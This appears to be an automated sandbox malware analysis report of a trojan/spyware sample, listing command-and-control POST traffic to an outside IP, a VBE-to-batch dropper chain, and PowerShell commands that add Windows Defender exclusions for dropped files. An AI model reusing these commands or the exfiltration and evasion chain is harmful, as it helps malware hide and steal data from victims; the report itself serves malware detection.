                          Source: global traffic HTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 86.110.194.28 Content-Length: 2080 Expect: 100-continue Connection: Keep-Alive
                          Source: global traffic HTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 86.110.194.28 Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
                          Source: global traffic HTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 86.110.194.28 Content-Length: 2092 Expect: 100-continue Connection: Keep-Alive
                          Source: global traffic HTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 86.110.194.28 Content-Length: 2504 Expect: 100-continue Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2504Expect: 100-continue
                          Source: global traffic | HTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: 86.110.194.28 | Content-Length: 2080 | Expect: 100-continue | Connection: Keep-Alive
                          Source: unknown | HTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: 86.110.194.28 | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000003084000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000003320000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000003199000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://86.110.194.28
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000003084000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000003320000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000003199000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWind
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Window created: window name: CLIPBRDWNDCLASS

                          System Summary

                          Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                          Source: C:\Users\user\Desktop\updIMdPUj8.exe Code function: 0_2_00B26FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00B26FAA
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe File created: C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe File created: C:\Windows\TAPI\b2c372d662fd88
                          Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                          Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\AQlYVRJc.log C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                          Source: C:\Users\user\Desktop\updIMdPUj8.exe Code function: String function: 00B3EB78 appears 39 times
                          Source: C:\Users\user\Desktop\updIMdPUj8.exe Code function: String function: 00B3EC50 appears 56 times
                          Source: C:\Users\user\Desktop\updIMdPUj8.exe Code function: String function: 00B3F5F0 appears 31 times
                          Source: updIMdPUj8.exe, 00000000.00000003.1674970927.0000000004F73000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs updIMdPUj8.exe
                          Source: updIMdPUj8.exe Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs updIMdPUj8.exe
                          Source: updIMdPUj8.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@35/375@0/2
                          Source: C:\Users\user\Desktop\updIMdPUj8.exe Code function: 0_2_00B26C74 GetLastError,FormatMessageW,0_2_00B26C74
                          Source: C:\Users\user\Desktop\updIMdPUj8.exe Code function: 0_2_00B3A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00B3A6C2
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe File created: C:\Program Files\Windows Multimedia Platform\ZWgKQlTqcrSB.exe
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe File created: C:\Users\user\Desktop\cXlUovHQ.log
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Mutant created: NULL
                          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
                          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
                          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8112:120:WilError_03
                          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
                          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7868:120:WilError_03
                          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\8f8e651a25a945ecc390a45c0da3cfc0265e5ce1aa467481e904db157d1d950e
                          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe File created: C:\Users\user\AppData\Local\Temp\b9WbqHIwBX
                          Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\BridgeSavesMonitor\PiJ39TM3MwLHVAF8MIz1L5IKE7LQcw3.bat" "
                          Source: C:\Users\user\Desktop\updIMdPUj8.exe Command line argument: sfxname 0_2_00B3DF1E
                          Source: C:\Users\user\Desktop\updIMdPUj8.exe Command line argument: sfxstime 0_2_00B3DF1E
                          Source: C:\Users\user\Desktop\updIMdPUj8.exe Command line argument: STARTDLG 0_2_00B3DF1E
                          Source: updIMdPUj8.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: updIMdPUj8.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\updIMdPUj8.exe File read: C:\Windows\win.ini
                          Source: C:\Users\user\Desktop\updIMdPUj8.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: xVasebWgWN.24.dr, prpSOqgc4D.24.dr, sCBZb0Pp3Y.24.dr, p6TPa701rJ.24.dr, JkX1ie4U9y.24.dr, h8GMe8gXsd.24.dr, C6WXCYBV07.24.dr, ubM4wnSOhw.24.dr, cnDaRUxtsG.24.dr, esdk4zhMi5.24.dr, sCBnbyN2XR.24.dr, borYX7RWaE.24.dr, 6xsDCHx81L.24.dr, rvup8Xvi7G.24.dr, IhCM28i2mX.24.dr, ulGvJFHis6.24.dr, JzHQCntgPc.24.dr, 4wPz7pNzuT.24.dr, 7DZ9klYdAj.24.dr, nmg5NLyrZF.24.dr, HZug7Ld03I.24.dr, RVnuqQIULS.24.dr, upKGyATyWO.24.dr, skMe0l7Ot3.24.dr, jY5S99BsYy.24.dr, wLcFEoU5tR.24.dr, hzYnIZKYRs.24.dr, jbsTN6qDV8.24.dr, Fg8TsxLY0Z.24.dr, QQfw1bpbuT.24.dr, z9f1OFTytt.24.dr, BcIFAwm04X.24.dr, 7KL2JobGTj.24.dr, EJMkEXj0lk.24.dr, O4Rr8IEjEc.24.dr, SJYPkMlurT.24.dr, g1bTMLHJ7C.24.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: updIMdPUj8.exe Virustotal: Detection: 58%
                          Source: updIMdPUj8.exe ReversingLabs: Detection: 68%
                          Source: C:\Users\user\Desktop\updIMdPUj8.exe File read: C:\Users\user\Desktop\updIMdPUj8.exe
                          Source: unknown Process created: C:\Users\user\Desktop\updIMdPUj8.exe "C:\Users\user\Desktop\updIMdPUj8.exe"
                          Source: C:\Users\user\Desktop\updIMdPUj8.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\BridgeSavesMonitor\wW6msodKQlyf4uIuEtxxIN9vzHkuk0mZkwmTg.vbe"
                          Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\BridgeSavesMonitor\PiJ39TM3MwLHVAF8MIz1L5IKE7LQcw3.bat" "
                          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe "C:\BridgeSavesMonitor/hypersurrogateComponentdhcp.exe"
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\ZWgKQlTqcrSB.exe'
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\ZWgKQlTqcrSB.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\csrss.exe'
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\ZWgKQlTqcrSB.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\Accessories\ZWgKQlTqcrSB.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\UV4iXMFwPx.bat"
                          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\TAPI\ZWgKQlTqcrSB.exe "C:\Windows\TAPI\ZWgKQlTqcrSB.exe"
                          Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: slc.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
